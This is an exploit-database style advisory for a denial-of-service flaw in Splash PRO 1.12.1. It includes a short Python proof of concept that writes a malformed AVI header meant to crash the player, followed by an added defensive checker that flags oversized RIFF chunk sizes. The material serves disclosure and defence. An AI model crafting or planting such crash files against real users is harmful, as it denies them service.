Vendor: Splash PRO
By: SecurityFocus
CVSS: 7.8 (HIGH)
Denial-of-Service
CWE: 400
Product Name: Splash PRO
Affected Version From: 1.12.1
Affected Version To: 1.12.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

Splash PRO Denial-of-Service Vulnerability

Splash PRO is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Proof-of-concept code is available that creates an AVI file with a crafted header; opening the file can crash the application.

Mitigation:

Upgrade to the latest version of Splash PRO.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/52273/info

Splash PRO is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Splash PRO 1.12.1 is vulnerable; other versions may also be affected. 

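# RIFF header: "RIFF", declared size 0x0008ad3c, form type "AVI ", then "LIST"
PoC = b"\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54"
# LIST chunk: declared size 0x00002272, list type "hdrl"
PoC += b"\x72\x22\x00\x00\x68\x64\x72\x6c"
payload = PoC
# Write the 24 header bytes in binary mode
with open("Crash.avi", "wb") as f:
    f.write(payload)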
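
A defensive pre-screening check, added here as an example and not part of the original advisory or the vendor's fix: it walks the top-level RIFF chunks of an AVI file and reports declared sizes that run past the end of the data, which both size fields in the PoC header do. The advisory does not state the root cause, so treating oversized size fields as the trigger is an assumption; the function and constant names are hypothetical.

```python
import struct

# Constructed sample: the same 24 header bytes the PoC on this page writes.
POC_HEADER = (b"RIFF" + struct.pack("<I", 0x0008AD3C) + b"AVI "
              + b"LIST" + struct.pack("<I", 0x2272) + b"hdrl")


def constructed_valid_sample():
    """Constructed well-formed counterpart: sizes match the bytes present."""
    body = b"AVI " + b"LIST" + struct.pack("<I", 4) + b"hdrl"
    return b"RIFF" + struct.pack("<I", len(body)) + body


def check_avi_header(data):
    """Return a list of structural problems in a RIFF/AVI byte string."""
    if len(data) < 12:
        return ["shorter than the 12-byte RIFF header"]
    magic, riff_size, form = struct.unpack_from("<4sI4s", data, 0)
    if magic != b"RIFF" or form != b"AVI ":
        return ["not a RIFF/AVI file"]
    problems = []
    # riff_size counts every byte after the 8-byte "RIFF" + size prefix.
    if riff_size + 8 > len(data):
        problems.append("RIFF size %d exceeds file length %d"
                        % (riff_size + 8, len(data)))
    end = min(len(data), riff_size + 8)
    pos = 12
    # Walk top-level chunks only; nested LIST contents are not descended into.
    while pos < end:
        if pos + 8 > end:
            problems.append("truncated chunk header at offset %d" % pos)
            break
        tag, size = struct.unpack_from("<4sI", data, pos)
        if pos + 8 + size > end:
            problems.append("chunk %r at offset %d declares %d bytes, "
                            "only %d available" % (tag, pos, size, end - pos - 8))
            break
        # Chunks are word-aligned: an odd size is followed by one pad byte.
        pos += 8 + size + (size & 1)
    return problems


if __name__ == "__main__":
    for name, blob in (("poc", POC_HEADER), ("valid", constructed_valid_sample())):
        print(name, check_avi_header(blob) or "ok")
```

A check like this can run in a mail or upload gateway to quarantine files whose declared sizes do not fit the data before they reach a media player.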